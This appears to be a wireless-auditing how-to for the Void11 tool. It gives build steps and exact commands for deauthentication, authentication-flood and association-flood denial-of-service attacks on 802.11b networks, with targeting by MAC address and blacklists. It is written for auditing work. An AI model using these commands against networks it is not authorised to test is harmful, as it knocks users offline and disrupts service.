Void11 Main:
"Void11 a free implementation of some basic 802.11b
attacks." -www.wlsec.net
Project homepage:
http://www.wlsec.net/void11 (Currently offline)
Local Mirror:
void11-0.2.0.tar.bz2
MD5: 1c5b3e3e70916de74c2932c7f3e46d9e
Local Mirror: hostapd-0.1.3.tar.gz
MD5: 54563fb51f143c4bf26ddec2516e8f9f
NOTE: Void11 only works with the hostap driver (e.g. the Prism
card)
Void11 Installation:
The following installation process assumes
that you are utilising the Auditing Laptop Build as described in the
Auditing Laptop Build: HOWTO
* Void11 only works with the hostap driver (e.g. the Prism
card)
Download
hostapd-0.1.3.tar.gz from
http://hostap.epitest.fi/releases to /tools/wifi
(The void11 install does not work with
later versions of hostapd)
cd
/tools/wifi/
tar zxvf
hostapd-0.1.3.tar.gz
cd
hostapd-0.1.3
make
Download
void11-[version].bz2 from
http://www.wlsec.net/void11 to /tools/wifi
cd /tools/wifi
bunzip2 void11-version].bz2
tar xvf void11-[version].tar
cd void11-[version]
make HOSTAPD_PATH=/tools/wifi/hostapd-0.1.3
USEGTK=1 USECONSOLE=1 all install
This will fail, but it will create libvoid11.so
in /tools/wifi/void11-[version]/lib
cp lib/libvoid11.so /usr/lib
make HOSTAPD_PATH=/tools/wifi/hostapd-0.1.3
USEGTK=1 USECONSOLE=1 all install
ldconfig
typing
void11_penetration will confirm whether the install was successful
Void11 Attacks:
Void11 offers three attack mechanisms:
Deauthenticate Clients (default mode):
Authentication Flood:
Association Flood:
Using Void11:
ensure your prism card is inserted
cd /tools/wifi/void11-0.2.0/console
iwconfig wlan0 mode master (set card to master mode)
iwpriv wlan0 hostapd 1 (set card to hostapd mode)
./void11_hopper (set the card to hop between all 14
channels)
Or as an alternative to using void_hopper mode - set the
card to the desired channel manually:
Now the card is configured for the actual attacks:
Usage: void11_penetration [interface] -D -s [type of attack]
-s [station MAC] -S [SSID] -B [BSSID]
e.g. void11_penetration wlan0 -D -t 1 -s
00:06:25:2D:09:68 -B 00:06:02:35:AB:06
void11_penetration switches:
void11_penetration in use:
Disassociation mode (-t 1) seems by far the most
effective actually dropping the network connection between servers and clients.
Authentication flood mode (-t 2) also proves very
effective whilst not physically dropping the client connection all data transfer
across the network ground to a halt.
Association flood mode (-t 3) also proves very effective
whilst not physically dropping the client connection all data transfer across
the network ground to a halt.
Whitelists and Blacklists:
Void11 also offers the -l and -p switches for use
with the whitelists and blacklists. A whitelist is simply a list of
SSIDs/BSSIDs that you do not want to attack (i.e. your home network), while a
blacklist is a set of SSIDs/BSSIDs that would want to attack (i.e. a wardriver).
Usage: void11 -l [list name] -p [0=whitelist (default),
1=blacklist]
There is a default matchlist in the void11/console directory.
A typical matchlist may contain:
B 00:06:BF:64:AB:35
(B=BSSID)
S MYSSID (S=SSID)
Using a Whitelist:
Now if we use void11
with the syntax:
void11 -D -l
matchlist wlan0
void11 treats the
matchlist as a whitelist and will not attack any BSSIDs listed.
Using a Blacklist:
However if we use
void11 with the syntax
void11 -D -l
matchlist -p 1 wlan0
void11 treats the
matchlist as a blacklist and will only attack any BSSID listed.
Be aware that if you are
using the S (SSID) option with a whitelist and the SSID is not broadcast
by the access point then that access point will be treated as blacklisted as
void11 cannot see its SSID (unless there is a blank S entry in the
matchlist)
gvoid11:
Void11 also provides a GTK+ GUI front-end called gvoid11
which looks very good and offers many features of the command line tool.
Type 'gvoid11' to start the GUI tool:
|
Linux
